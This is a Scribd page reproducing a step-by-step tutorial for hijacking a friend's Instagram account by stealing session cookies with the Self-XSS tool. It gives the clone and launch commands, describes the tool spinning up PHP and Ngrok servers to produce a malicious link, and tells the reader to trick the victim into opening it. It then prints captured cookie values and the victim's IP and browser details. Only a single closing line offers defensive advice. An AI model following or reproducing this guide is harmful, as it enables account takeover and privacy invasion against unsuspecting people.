Scribd Logo
Upload

Welcome to Scribd!

  • Hack Instagram of Your Friend and Hijack.

    Uploaded by

    securitynewspaper
    58 views4 pages
    Do you know, its easy is to hack the Instagram account of your friend and hijack his or her Instagram cookies. This is one of the tricks used by hackers to steal your Instagram account. Whenever we logged into any website suppose Instagram, the Instagram server stores small piece code (also called web cookie) in our browsers. As commented by the researcher of the International Institute of Cyber Security, “If we are able to steal or Hijack these web cookies (we got after authenticating/logging o

    Original Title

    Hack Instagram of Your Friend and Hijack.-converted

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Do you know, its easy is to hack the Instagram account of your friend and hijack his or her Instagram cookies. This is one of the tricks used by hackers to steal your Instagram account. Whenever we logged into any website suppose Instagram, the Instagram server stores small piece code (also called web cookie) in our browsers. As commented by the researcher of the International Institute of Cyber Security, “If we are able to steal or Hijack these web cookies (we got after authenticating/logging o

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    58 views4 pages

    Hack Instagram of Your Friend and Hijack.

    Uploaded by

    securitynewspaper
    Do you know, its easy is to hack the Instagram account of your friend and hijack his or her Instagram cookies. This is one of the tricks used by hackers to steal your Instagram account. Whenever we logged into any website suppose Instagram, the Instagram server stores small piece code (also called web cookie) in our browsers. As commented by the researcher of the International Institute of Cyber Security, “If we are able to steal or Hijack these web cookies (we got after authenticating/logging o

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 4

    HACK INSTAGRAM OF YOUR FRIEND AND

    HIJACK HIS/HER INSTAGRAM COOKIES


    INTRODUCTION
    Do you know, its easy is to hack the Instagram account of your friend and hijack his or her Instagram cookies.
    This is one of the tricks used by hackers to steal your Instagram account. Whenever we logged into any
    website suppose Instagram, the Instagram server stores small piece code (also called web cookie) in our
    browsers. As commented by the researcher of the International Institute of Cyber Security, “If we are able to
    steal or Hijack these web cookies (we got after authenticating/logging on Instagram), we can log in to the
    Instagram account of that person“.

    Today we will show, how easy is it to get the cookies of authenticated/logged user of a particular website that
    can be your friend or relative using the Self-XSS hacking tool. Self-XSS uses social engineering tool and using
    this hacker can gain control of the victims’ Instagram account.

    ENVIRONMENT
    • OS: Kali Linux 2019.3 64 bit
    • Kernel version: 5.2.0

    INSTALLATION STEPS
    • Use this command to clone the project.
    • git clone https://github.com/thelinuxchoice/self-xss

    root@kali:/home/iicybersecurity# git clone https://github.com/thelinuxchoice/self-xss

    Cloning into 'self-xss'...

    remote: Enumerating objects: 38, done.

    remote: Counting objects: 100% (38/38), done.

    remote: Compressing objects: 100% (37/37), done.

    remote: Total 38 (delta 12), reused 0 (delta 0), pack-reused 0

    Unpacking objects: 100% (38/38), 12.79 KiB | 422.00 KiB/s, done.

    • Use the cd command to enter into self-xss directory

    root@kali:/home/iicybersecurity# cd self-xss/

    root@kali:/home/iicybersecurity/self-xss#
    • Now, use this command to launch the tool bash self-xss.sh

    Self-XSS – Malicious code

    • After Launching the tool, first we have to enter the website name whose account we want to hack. In our
    case, it will be https://instagram.com
    • Next, enter the Email and password details.
    • Then the tool will downloads the Ngrok server automatically and start the PHP server and Ngrok server.
    • Then it will give to malicious URL as we can see in the above picture.
    • Now, send this malicious code to the victim using social engineering tricks and ask the victim to open this
    link in the same Instagram Browser Tab.
    Self-XSS – Malicious code Injected
    • The Malicious code will captures the Instagram cookies and IP Address details of the victim and sends back
    to the hacker.
    • Now go to hacker machine where self-XSS is running.
    • go to cd /home/iicybersecurity/self-xss
    • To verify, use the cat command to view the details of the cookies.
    o cat cookies.backup

    root@kali:/home/iicybersecurity/self-xss# cat cookies.backup

    mid=XsYGMQALAAFTsuFdOqBKpj1oAJs6; csrftoken=2Z8ovGnPCnaRccQ7Og2GlPLWBIAj4zFD;
    ds_user_id=29687340949

    • We go the Instagram cookies.


    • Now use cat command to view the IP and browser details .
    o cat saved.ip.txt
    root@kali:/home/iicybersecurity/self-xss# cat saved.ip.txt

    IP: 112.196.159.115

    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


    Gecko) Chrome/81.0.4044.138 Safari/537.36

    Here, we successfully got the victims IP address with Machine details and victim’s Instagram cookies.

    CONCLUSION
    Now, we saw how to find the cookies details of the victim using a self-XSS in combination with social
    engineering. So it is always recommended to never click on any suspicious link, and that too when you are
    logged into any social networking website or any other website.

    You might also like